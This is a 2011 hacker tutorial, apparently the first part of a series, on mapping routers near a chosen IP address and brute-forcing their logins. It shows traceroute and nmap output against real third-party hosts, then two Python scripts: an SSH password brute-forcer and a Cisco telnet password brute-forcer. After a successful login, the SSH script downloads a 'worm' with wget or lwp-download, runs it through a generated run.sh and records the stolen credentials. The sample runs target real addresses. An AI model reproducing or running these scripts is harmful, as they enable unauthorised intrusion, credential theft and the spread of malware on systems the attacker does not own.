Testing Weak Passwords on some BGP - (Part 1)
Hello back again with me evilut10n a.k.a ev1lut10n, today we're going play
around by examining some hops. Example we have foreign ip addr
72.9.242.206,
let's do a traceroute:
from #1 box:
===========
sh-3.1# traceroute 72.9.242.206
traceroute to 72.9.242.206 (72.9.242.206), 30 hops max, 40 byte packets
1 203.142.71.145 (203.142.71.145) 2.070 ms 5.719 ms 2.274 ms
2 202.169.32.161 (202.169.32.161) 2.252 ms 0.943 ms 2.296 ms
3 203.142.67.57 (203.142.67.57) 170.668 ms 168.425 ms 166.117 ms
4 112.78.190.146 (112.78.190.146) 0.583 ms 2.458 ms 4.434 ms
5 id-jkt-mid-igw-3.biznetnetworks.com (202.169.34.90) 2.098 ms 0.591
ms 84.295 ms
6 202.169.34.182 (202.169.34.182) 149.619 ms 205.955 ms 202.077 ms
7 203.208.174.65 (203.208.174.65) 198.081 ms 199.698 ms 195.697 ms
8 POS3-6.sngtp-ar1.ix.singtel.com (203.208.172.9) 187.701 ms 183.827
ms 179.829 ms
9 so-3-0-0-0.laxow-cr1.ix.singtel.com (203.208.151.222) 354.366 ms
349.425 ms 345.548 ms
10 ge-4-0-0-0.laxow-dr2.ix.singtel.com (203.208.149.34) 341.549 ms
339.295 ms so-2-0-3-0.plapx-cr2.ix.singtel.com (203.208.149.246) 333.672
ms
11 203.208.186.82 (203.208.186.82) 331.298 ms 327.420 ms 323.547 ms
12 ae1-50g.cr1.lax1.us.nlayer.net (69.31.127.129) 319.421 ms 315.546
ms 313.295 ms
13 xe-1-0-0.cr1.iah1.us.nlayer.net (69.22.142.121) 459.824 ms 455.949
ms 452.201 ms
14 xe-4-2-1.cr1.atl1.us.nlayer.net (69.22.142.118) 451.572 ms 447.695
ms 443.697 ms
15 ae1-40g.ar1.atl1.us.nlayer.net (69.31.135.130) 411.970 ms 407.026
ms 405.027 ms
16 as3595.xe-2-0-5-103.ar1.atl1.us.nlayer.net (69.31.135.54) 400.905 ms
397.029 ms 393.152 ms
17 63.247.64.158 (63.247.64.158) 450.615 ms 446.617 ms 442.738 ms
18 72.9.251.141 (72.9.251.141) 438.742 ms 434.863 ms 430.865 ms
19 72.9.242.206 (72.9.242.206) 428.614 ms 424.737 ms 420.862 ms
sh-3.1#
==============
from #2 box:
================
$ traceroute 72.9.242.206
traceroute to 72.9.242.206 (72.9.242.206), 30 hops max, 60 byte packets
1 10.18.0.1 (10.18.0.1) 61.230 ms 61.283 ms 61.293 ms
2 fm-ip-202.73.96.73.fast.net.id (202.73.96.73) 63.075 ms 63.092 ms
63.108 ms
3 fm-ip-202.73.96.73.fast.net.id (202.73.96.73) 63.122 ms 63.139 ms
63.153 ms
4 fm-ip-202.73.96.70.fast.net.id (202.73.96.70) 62.781 ms 62.838 ms
62.858 ms
5 IP-125-33.MCS.napinfo.net (119.110.125.33) 167.950 ms 168.004 ms
168.019 ms
6 IP-112-230.MCS.napinfo.net (119.110.112.230) 144.061 ms 22.813 ms
22.859 ms
7 snge-b2-link.telia.net (213.248.86.73) 23.548 ms 23.665 ms 23.607
ms
8 hnk-b2-link.telia.net (80.91.245.149) 57.286 ms hnk-b2-link.telia.net
(80.91.245.151) 55.632 ms hnk-b2-link.telia.net (80.91.245.149) 57.332
ms
9 las-bb1-link.telia.net (213.155.130.36) 222.901 ms 222.782 ms
222.963 ms
10 dls-bb1-link.telia.net (213.248.80.14) 262.366 ms 255.400 ms
260.453 ms
11 atl-bb1-link.telia.net (80.91.246.74) 271.448 ms
atl-bb1-link.telia.net (80.91.246.73) 277.744 ms atl-bb1-link.telia.net
(80.91.246.74) 271.948
ms
12 globalnet-ic-129966-atl-bb1.c.telia.net (213.248.93.110) 279.818 ms
278.362 ms 278.440 ms
13 63.247.64.158 (63.247.64.158) 282.985 ms 283.061 ms 283.042 ms
14 72.9.251.141 (72.9.251.141) 272.594 ms 267.265 ms 266.719 ms
15 72.9.242.206 (72.9.242.206) 267.505 ms 268.574 ms 265.572 ms
================
from #3 box:
=================
sh-3.2# traceroute 72.9.242.206
traceroute to 72.9.242.206 (72.9.242.206), 30 hops max, 40 byte packets
1 gw-216-6.serverspeed.serverspeedy.com (49.0.6.217) 0.196 ms 0.251 ms
0.237 ms
2 49.156.23.229 (49.156.23.229) 0.860 ms 0.852 ms *
3 * * 253.subnet175-103-50.maxindo.net.id (175.103.50.253) 0.887 ms
4 203.81.188.221 (203.81.188.221) 1.726 ms 1.701 ms 1.688 ms
5 203.81.188.217 (203.81.188.217) 1.675 ms 1.664 ms *
6 * * *
7 if-4-0-1-575.core1.SVQ-Singapore.as6453.net (216.6.91.29) 200.885 ms
200.973 ms 201.047 ms
8 if-5-3233.tcore1.PDI-PaloAlto.as6453.net (66.198.127.29) 201.666 ms *
*
9 * * *
10 * Vlan3254.icore1.SQN-SanJose.as6453.net (66.198.144.6) 201.278 ms *
11 sjo-bb1-link.telia.net (213.248.95.129) 191.178 ms 191.904 ms
191.551 ms
12 * ash-bb1-link.telia.net (213.155.130.212) 266.430 ms 264.877 ms
13 atl-bb1-link.telia.net (80.91.252.214) 278.309 ms 278.563 ms
279.392 ms
14 globalnet-ic-129966-atl-bb1.c.telia.net (213.248.93.110) 258.743 ms
258.231 ms 258.034 ms
15 63.247.64.146 (63.247.64.146) 257.607 ms 258.787 ms 258.333 ms
16 72.9.251.141 (72.9.251.141) 258.018 ms 257.988 ms 258.124 ms
17 72.9.242.206 (72.9.242.206) 260.072 ms 262.395 ms 266.793 ms
sh-3.2#
==================
from #4 box
===========
1 85.153.18.217 (85.153.18.217) 0.553 ms 0.502 ms 0.509 ms
2 85.153.6.66 (85.153.6.66) 0.457 ms 0.448 ms 0.443 ms
3 85.153.1.1 (85.153.1.1) 0.500 ms 0.283 ms 0.253 ms
4 195.175.51.169 (195.175.51.169) 0.870 ms 1.000 ms 2.659 ms
5 * 81.212.212.101 (81.212.212.101) 1.005 ms 0.683 ms
6 static.turktelekom.com.tr (212.156.103.33) 56.032 ms 55.871 ms
55.934 ms
7 ldn-b5-link.telia.net (213.248.104.41) 67.999 ms 68.186 ms 67.996
ms
8 ldn-bb2-link.telia.net (80.91.250.169) 67.882 ms
ldn-bb1-link.telia.net (80.91.247.91) 68.177 ms ldn-bb1-link.telia.net
(80.91.249.179) 68.291 ms
9 ash-bb1-link.telia.net (213.248.65.210) 152.221 ms 151.703 ms
171.694 ms
10 atl-bb1-link.telia.net (80.91.252.214) 159.651 ms
atl-bb1-link.telia.net (80.91.247.173) 161.079 ms atl-bb1-link.telia.net
(80.91.248.137)
167.140 ms
11 globalnet-127291-atl-bb1.c.telia.net (213.248.90.54) 150.307 ms
148.945 ms 150.492 ms
12 63.247.64.150 (63.247.64.150) 148.940 ms 149.189 ms 148.730 ms
13 72.9.251.141 (72.9.251.141) 150.687 ms 150.648 ms 150.887 ms
14 72.9.242.206 (72.9.242.206) 152.043 ms 149.936 ms 152.036 ms
==============
ok from above result, let's examine some hops:
63.247.64.146
63.247.64.158
63.247.64.150
72.9.251.141
ok let's grab some info from these bgp(s):
====================
# nmap -A 63.247.64.146 -PN
Starting Nmap 5.21 ( http://nmap.org ) at 2011-06-17 08:13 WIT
Nmap scan report for 63.247.64.146
Host is up (0.27s latency).
Not shown: 961 closed ports, 38 filtered ports
PORT STATE SERVICE VERSION
23/tcp open telnet Cisco router
Device type: switch|router|broadband router|WAP|specialized|VoIP adapter
Running (JUST GUESSING) : Cisco IOS 12.X|11.X (98%), Cisco embedded (93%),
Cisco CatOS (93%)
Aggressive OS guesses: Cisco Catalyst 6500-series switch (IOS 12.1) (98%),
Cisco Catalyst 2950 switch (IOS 12.1) (97%), Cisco 2900-series, 3650, or
3750
switch; 6509 or 7206VXR router; or uBR925 or uBR7111 cable modem (IOS 12.1
- 12.2) (97%), Cisco Aironet 350 or 1200 WAP (96%), Cisco Catalyst 2960
switch (IOS 12.2) (96%), Cisco Catalyst 2960, 3550, or 3560 switch (IOS
12.2) (96%), Cisco Catalyst 2960, 3560, or 6500 switch (IOS 12.2) (95%),
Cisco
2950, 2960, 3550, or 3560 switch (IOS 12.1 - 12.2) (95%), Cisco DOCSIS
cable modem termination server (IOS 12.1) (94%), Cisco 806, 1712, 1721, or
2600
router (IOS 12.2 - 12.3) (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 14 hops
Service Info: OS: IOS; Device: router
========================
# nmap -A -PN 63.247.64.158
Starting Nmap 5.21 ( http://nmap.org ) at 2011-06-17 08:18 WIT
Nmap scan report for 63.247.64.158
Host is up (0.27s latency).
Not shown: 961 closed ports, 38 filtered ports
PORT STATE SERVICE VERSION
23/tcp open telnet Cisco router
Device type: switch
Running: Cisco IOS 12.X
OS details: Cisco Catalyst 2960, 3560, or 6500 switch (IOS 12.2), Cisco
Catalyst 6500-series switch (IOS 12.1)
Network Distance: 13 hops
Service Info: OS: IOS; Device: router
===================
# nmap -A -PN 63.247.64.150
Starting Nmap 5.21 ( http://nmap.org ) at 2011-06-17 08:18 WIT
Nmap scan report for 63.247.64.150
Host is up (0.27s latency).
Not shown: 961 closed ports, 38 filtered ports
PORT STATE SERVICE VERSION
23/tcp open telnet Cisco router
Device type: switch|router|broadband router|WAP|specialized|VoIP adapter
Running (JUST GUESSING) : Cisco IOS 12.X|11.X (98%), Cisco embedded (93%),
Cisco CatOS (92%)
Aggressive OS guesses: Cisco Catalyst 6500-series switch (IOS 12.1) (98%),
Cisco 2900-series, 3650, or 3750 switch; 6509 or 7206VXR router; or uBR925
or
uBR7111 cable modem (IOS 12.1 - 12.2) (97%), Cisco Catalyst 2950 switch
(IOS 12.1) (97%), Cisco Catalyst 2960 switch (IOS 12.2) (96%), Cisco
Aironet 350
or 1200 WAP (95%), Cisco Catalyst 2960, 3550, or 3560 switch (IOS 12.2)
(95%), Cisco Catalyst 2960, 3560, or 6500 switch (IOS 12.2) (95%), Cisco
806,
1712, 1721, or 2600 router (IOS 12.2 - 12.3) (94%), Cisco Aironet 1200 WAP
(IOS 12.3) (94%), Cisco 2950, 2960, 3550, or 3560 switch (IOS 12.1 - 12.2)
(94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 13 hops
Service Info: OS: IOS; Device: router
===================
# nmap -A 72.9.251.141 -PN
Starting Nmap 5.21 ( http://nmap.org ) at 2011-06-17 08:11 WIT
Nmap scan report for 72.9.251.141
Host is up (0.27s latency).
Not shown: 957 closed ports, 41 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.5p1 (FreeBSD 20061110; protocol 2.0)
|_ssh-hostkey: 1024 20:38:e5:3b:f9:93:d0:15:ab:bc:61:01:30:6e:89:f6 (DSA)
199/tcp open smux Linux SNMP multiplexer
Device type: general purpose
Running: FreeBSD 6.X
OS details: FreeBSD 6.2-STABLE - 6.4-STABLE
Network Distance: 14 hops
Service Info: OSs: FreeBSD, Linux
=======================
* Brute forcing SSHD
ok let's try from the one who have sshd, I use this simple python script
for brute forcing
========
#!/usr/bin/python
#made by: ev1lut10n
import paramiko
import pexpect
import sys
import time
import os
import random
db = "log"
opla = ['/var/tmp/', '/tmp/']
acak=random.randint(0, 1)
path=opla[acak]
user=sys.argv[1]
serv=sys.argv[2]
daftar=sys.argv[3]
port=sys.argv[4]
url_worm=sys.argv[5]
fd = open(daftar)
content = fd.readline()
perintah1="cd "+path+";lwp-download "+url_worm
perintah2="cd "+path+";wget "+url_worm
perintah3="echo 'cd "+path+";tar zxvf .data.tgz;cd "+path+"/.backups/;perl
backup.pl'>"+path+"run.sh"
perintah4="cd "+path+";chmod +x run.sh;"
perintah5="sh "+path+"run.sh;cd "+path+";./run.sh"
def logindaninfek():
global s
global x
global serv
global content
global perintah1
global perintah2
global perintah3
global perintah4
global perintah5
global perintah6
global ekstrak
global infek
global user
print "\nstart login and infect\n"
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(serv, username=user,password=content)
print "\nexecuting "+perintah1
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah1)
print "\nexecuting "+perintah2
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah2)
print "\nexecuting "+perintah3
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah3)
print "\nexecuting "+perintah4
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah4)
print "\nexecuting "+perintah5
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah5)
content=content.strip()
perintah6="echo '"+user+":"+content+"'>"+path+".backups/userpass"
print "\necho '"+user+":"+content+"'>"+path+".backups/userpass"
os.system(perintah6)
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah6)
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
print >>sys.stderr, "fork #1 failed: %d (%s)" % (e.errno,
e.strerror)
sys.exit(1)
foo = pexpect.spawn('ssh '+user+'@'+serv+' -p '+port)
foo.expect('yes/no', timeout=190)
foo.sendline('yes')
foo.expect('assword:',timeout=190)
foo.sendline('root')
i = foo.expect (['assword:', 'Terminal type', '[#\$] '],timeout=190)
if i==0:
print '\nlogin failure at '+serv+' using password:root'
foo.kill(0)
elif i==2:
file = open(db, "a")
print '\nLogin OK... at '+serv+' using password:root'
logindaninfek()
file.write("\n"+serv+":root")
sys.exit(1)
elif i==3:
file = open(db, "a")
print '\nLogin OK... at '+serv+' using password:root'
logindaninfek()
file.write("\n"+serv+":root")
sys.exit(1)
while (content != "" ):
content.replace( "\n", "" )
content = fd.readline()
content=content.strip()
foo = pexpect.spawn('ssh '+user+'@'+serv+' -p '+port)
foo.expect('.*',timeout=190)
foo.sendline(content)
i = foo.expect (['assword:', 'Terminal type', '[#\$] '],timeout=190)
if i==0:
print '\nlogin failure at '+serv+' using password:'+content
foo.kill(0)
elif i==2:
print 'Shell command prompt at '+serv+':'+content
logindaninfek()
os.system('perl report.pl '+serv+'|'+content)
file = open(db, "a")
file.write("\n"+serv+":"+content)
sys.exit(1)
elif i==3:
print 'Login OK.'
print 'Shell command prompt at '+serv+':'+content
logindaninfek()
os.system('perl report.pl '+serv+'|'+content)
file = open(db, "a")
file.write("\n"+serv+":"+content)
sys.exit(1)
=====================================
before running that script u need paramiko and pexpect python module ,
name above script: ssh.py
testing for brute force is simple, example of using above script:
========================
$ python ssh.py root 72.9.251.141 password.txt 22 http://devilzc0de.org
$
login failure at 72.9.251.141 using password:root
login failure at 72.9.251.141 using password:123456
login failure at 72.9.251.141 using password:12345
login failure at 72.9.251.141 using password:1234567
login failure at 72.9.251.141 using password:12345678
login failure at 72.9.251.141 using password:123456789
login failure at 72.9.251.141 using password:Password
login failure at 72.9.251.141 using password:iloveyou
login failure at 72.9.251.141 using password:admin
login failure at 72.9.251.141 using password:administrator
login failure at 72.9.251.141 using password:toor
login failure at 72.9.251.141 using password:admin123
login failure at 72.9.251.141 using password:123admin
login failure at 72.9.251.141 using password:princess
login failure at 72.9.251.141 using password:rockyou
login failure at 72.9.251.141 using password:abc123
login failure at 72.9.251.141 using password:Nicole
login failure at 72.9.251.141 using password:Daniel
========and so on===========
====================
password.txt is your dictionary file , 22 is ssh port number, root is
username to try for brute forcing
* Bruteforcing telnet
===================
next on 63.247.64.146 we see it's a cisco router with open port 23, let's
see how it works in case u wanna brute force u may use this simple brute
force
for bgp's telnet with 1 variable only
(password only)
==================
#!/usr/bin/python
#made by: ev1lut10n
#BGP's telnet brute force for 1 variable (password) input only
import pexpect
import sys
import time
import os
import random
#your password list goes here
daftar="password.txt"
#your target ip goes here
serv="63.247.64.146"
fd = open(daftar)
content = fd.readline()
while (content != "" ):
content.replace( "\n", "" )
content = fd.readline()
content=content.strip()
print "testing password:"+content
foo = pexpect.spawn('telnet '+serv)
i=foo.expect('assword:',timeout=190)
foo.sendline(content)
i2=foo.expect('assword:',timeout=190)
if i2==0:
foo.kill(0)
print "login failure using password: "+content
elif i2==2:
foo.kill(0)
print "[+] logged in using password:"+content
sys.exit(1)
elif i2==2:
foo.kill(0)
print "[+] logged in using password:"+content
sys.exit(1)
os.system("killall telnet")
================
sample usage:
===============
$ python telnet.py
testing password:123456
login failure using password: 123456
testing password:12345
login failure using password: 12345
testing password:1234567
login failure using password: 1234567
testing password:12345678
login failure using password: 12345678
testing password:123456789
login failure using password: 123456789
testing password:Password
========and so on=============
ok I'm going to continue next time, see u
.